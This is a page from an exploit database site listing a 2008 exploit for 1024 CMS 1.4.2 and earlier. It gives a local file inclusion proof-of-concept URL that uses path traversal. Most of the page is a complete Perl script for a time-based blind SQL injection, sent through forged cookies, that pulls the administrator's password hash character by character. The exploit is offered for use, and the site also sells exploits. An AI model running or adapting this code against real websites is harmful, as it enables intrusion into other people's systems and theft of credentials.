0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
1024 CMS <= 1.4.2 Local File Inclusion / Blind SQL Injection Exploit
==================================================================== 1024 CMS <= 1.4.2 Local File Inclusion / Blind SQL Injection Exploit ==================================================================== # Author: __GiReX__ # Date: 13/04/2008 # CMS: 1024 CMS <= 1.4.1 and 1.4.2 (beta) # Site: 1024cms.com # Bug1: Local File Inclusion # Need: magic_quotes_gpc = Off / register_globals = On # Bug2: Cookie Blind SQL Injection # Exploit: Admin Hash Retrieve Exploit # Need: magic_quotes_gpc = Off # Bug1: Vuln Code: pages/print/default/ops/news.php <?php if(!isset($_GET['id']) || !is_numeric($_GET['id'])) die("ID Not Set"); include("./lang/".$lang."/news/default.php"); # $lang is unset so we can exploit through local file inclusion # Include a local file in CMS directory # PoC: [host]/[path]/pages/print/default/ops/news.php?id=1&lang=../../../../../[local file]%00 # Bug2: Vuln Code: /includes/system.php: Lines 66-71 if(!isset($_SESSION['logged']) && (isset($_COOKIE['cookuid']) && isset($_COOKIE['cookpass']) && isset($_COOKIE['cooktype']) && isset($_COOKIE['cooklogged']))){ $_SESSION['logged'] = $_COOKIE['cooklogged']; $_SESSION['user'] = $_COOKIE['cookuid']; $_SESSION['type'] = $_COOKIE['cooktype']; $chk_comb = mysql_query("SELECT id, type, warning, banned FROM ".$prefix."users WHERE username='".$_SESSION['logged']."' AND password='".$_COOKIE['cookpass']."'") or die("Cannot check combination: ".mysql_error()); # We can exploit this vulnerable query editing our cookies and making a blind sql injection ### Start Exploit ### #!/usr/bin/perl -w # 1024 CMS <= 1.4.2 (beta) Remote Blind SQL Injection # Admin Hash Retrieve Exploit use LWP::UserAgent; use HTTP::Request; if(not defined $ARGV[0]) { print "usage: perl $0 [host] [path]\n"; print "example: perl $0 localhost /1024/\n"; exit; } my $client = new LWP::UserAgent; my @cset = (48..57, 97..102); my $hash = undef; my $host = ($ARGV[0] =~ /^http:\/\//) ? $ARGV[0]: 'http://' . $ARGV[0]; $host .= $ARGV[1] unless not defined $ARGV[1]; banner(); check_vuln($host) or die "[-] Site not vulnerable: maybe magic_quotes_gpc = On\n\n"; syswrite(STDOUT, "[+] Admin Hash: "); for($j = 1; $j <= 32; $j++) { for($i = 0; $i <= $#cset; $i++) { $pre_time = time(); $rv = check_char($cset[$i], $j); $post_time = time(); if($post_time - $pre_time > 3 and $rv) { $hash .= chr($cset[$i]); syswrite(STDOUT, chr($cset[$i]), 1); last; } } } if(not defined $hash or length($hash) != 32) { print STDOUT "\n[-] Exploit mistake: please check the benchmark and the sql query\n\n"; } else { print STDOUT "\n[+] Exploit terminated\n\n"; } sub banner { print "\n"; print "[+] 1024 CMS <= 1.4.2 (beta) Remote Blind SQL Injection\n"; print "[+] Admin Hash Retrieve Exploit\n"; print "[+] Coded by __GiReX__\n"; print "\n"; } sub check_vuln { my $target = shift; $get = new HTTP::Request(GET, $target); $get->header(Cookie => "cookpass=-1'; cookuid=0; cooktype=0; cooklogged=0; cookuser=0"); $res = $client->request($get); if($res->is_success) { return 1 if $res->as_string =~ /Cannot check combination/; } else { die "[-] Invalid target : ${target}\n\n"; } return 0; } sub check_char { my ($char, $n) = @_; $get->header(Cookie => 'cookpass=-1\'+AND+'. 'CASE+WHEN(SELECT ASCII(SUBSTRING(password,'.$n.',1))+'. 'FROM+otatf_users+WHERE+id=1)='.$char.'+'. 'THEN+BENCHMARK(90000000,CHAR(0))+END#; '. 'cookuid=1; cooktype=1; cooklogged=1; cookuser=1'); $res = $client->request($get); return $res->is_success; } # 0day.today [2024-12-24] #